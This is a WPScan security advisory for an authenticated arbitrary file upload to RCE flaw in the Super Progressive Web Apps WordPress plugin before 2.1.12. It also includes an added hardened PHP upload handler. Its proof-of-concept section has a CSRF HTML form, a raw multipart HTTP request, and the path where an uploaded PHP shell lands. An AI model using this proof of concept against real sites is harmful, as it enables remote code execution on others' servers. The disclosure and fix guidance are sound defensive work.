WPScan

WordPress Plugin Vulnerabilities

Super Progressive Web Apps < 2.1.12 - Authenticated (Low Privileged) Arbitrary File Upload to RCE

Description

When the Apple Touch Icons & Splash Screen add-on is active, its superpwa_splashscreen_uploader AJAX action does not properly check for CSRF, authorisation, or the content of the uploaded archive file. This allows attackers to upload an archive containing a PHP file, leading to RCE, either from a low-privileged account (subscriber or higher) or via a CSRF attack against any logged-in user.

v2.1.11 fixed only the CSRF check; v2.1.12 added the capability check.
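The three missing controls named above (a CSRF nonce, a capability check, and validation of what the archive actually contains) map directly onto three checks in a WordPress AJAX handler. The following is an added illustration, not the Super Progressive Web Apps plugin's own code: a hardened handler for the same admin-ajax.php action. The hook name and the upload directory come from the advisory; the function names, the nonce action string and the image-only policy are assumptions made for this example.

```php
<?php
// Added example (not the plugin's code): a hardened handler for the
// superpwa_splashscreen_uploader admin-ajax action. Function and nonce
// names are hypothetical; the hook name and target directory match the advisory.

add_action( 'wp_ajax_superpwa_splashscreen_uploader', 'example_hardened_splash_uploader' );

function example_hardened_splash_uploader() {
    // 1. CSRF: require a nonce bound to this action (the control v2.1.11 added).
    //    check_ajax_referer() terminates the request when the nonce is missing or bad,
    //    so the advisory's plain HTML form (which sends no nonce) stops here.
    check_ajax_referer( 'example_splash_upload', 'nonce' );

    // 2. Authorisation: only users who may manage the site change its assets
    //    (the control v2.1.12 added). A subscriber is rejected here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Input: require a file that arrived without transport errors.
    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_send_json_error( 'no file uploaded', 400 );
    }

    $target_dir = trailingslashit( wp_upload_dir()['basedir'] ) . 'superpwa-splashIcons/';
    wp_mkdir_p( $target_dir );

    $result = example_extract_image_only_archive( $_FILES['file']['tmp_name'], $target_dir );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 400 );
    }
    wp_send_json_success( $result );
}

/**
 * Extract only PNG/JPEG entries from $zip_path into $target_dir.
 * The whole archive is rejected if any entry is not an allowed image or
 * if an entry name carries a path (zip-slip / traversal). Returns the list
 * of written file names, or a WP_Error.
 */
function example_extract_image_only_archive( $zip_path, $target_dir ) {
    $allowed_mimes = array( 'png' => 'image/png', 'jpg|jpeg' => 'image/jpeg' );
    $zip           = new ZipArchive();
    if ( true !== $zip->open( $zip_path ) ) {
        return new WP_Error( 'bad_zip', 'not a valid zip archive' );
    }

    // Validate every entry before writing anything, so one .php entry cannot
    // be extracted alongside legitimate icons.
    $entries = array();
    for ( $i = 0; $i < $zip->numFiles; $i++ ) {
        $name = $zip->getNameIndex( $i );
        if ( '' === $name || '/' === substr( $name, -1 ) ) {
            continue; // directory entry
        }
        // Reject nested or traversing names ("../x.php", "a/b.png", "..\x.php").
        if ( false !== strpbrk( $name, "/\\" ) ) {
            $zip->close();
            return new WP_Error( 'bad_entry', "path in entry name rejected: $name" );
        }
        // wp_check_filetype() maps the extension against the allow-list only;
        // php, phtml, htaccess and the like yield ext === false.
        $type = wp_check_filetype( $name, $allowed_mimes );
        if ( empty( $type['ext'] ) ) {
            $zip->close();
            return new WP_Error( 'bad_entry', "non-image entry rejected: $name" );
        }
        // Defence in depth: the bytes must decode as an image of the claimed type.
        $data = $zip->getFromIndex( $i );
        $info = @getimagesizefromstring( $data );
        if ( false === $info || $info['mime'] !== $type['type'] ) {
            $zip->close();
            return new WP_Error( 'bad_entry', "entry is not a real image: $name" );
        }
        $entries[ $name ] = $data;
    }
    $zip->close();

    $written = array();
    foreach ( $entries as $name => $data ) {
        file_put_contents( $target_dir . $name, $data );
        $written[] = $name;
    }
    return $written;
}
```

The legitimate admin page would emit the nonce with wp_create_nonce( 'example_splash_upload' ) and post it in a field named nonce. The extension allow-list is the control that actually prevents execution (a file never lands on disk with a .php name); the byte-level image check is additional hardening against hosts that execute other extensions, not a substitute for it.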

Proof of Concept

Log in to the blog as a low-privileged user (such as a subscriber), save the code below in an HTML file (replacing example.com with the correct domain), then open it in the same browser used to log in to the blog and select an archive containing a PHP file.

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
    Zipped PHP File
    <input type="file" name="file"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>
</html>


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42382098251599243971534803211
Content-Length: 595
Connection: close
Cookie: [low privilege cookies]
Upgrade-Insecure-Requests: 1

-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="action"

superpwa_splashscreen_uploader
-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="file"; filename="134.zip"
Content-Type: application/zip

[binary ZIP data of 134.zip, containing the entry 134-zipped.php]
-----------------------------42382098251599243971534803211--


The uploaded PHP file will then be reachable at https://example.com/wp-content/uploads/superpwa-splashIcons/134-zipped.php

Affects Plugins

super-progressive-web-apps
Fixed in version 2.1.12

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
4fd989ae-db35-40fa-ba61-b2d4fbb3994d

Timeline

Publicly Published

2021-06-29

Added

2021-06-29

Last Updated

2021-06-29
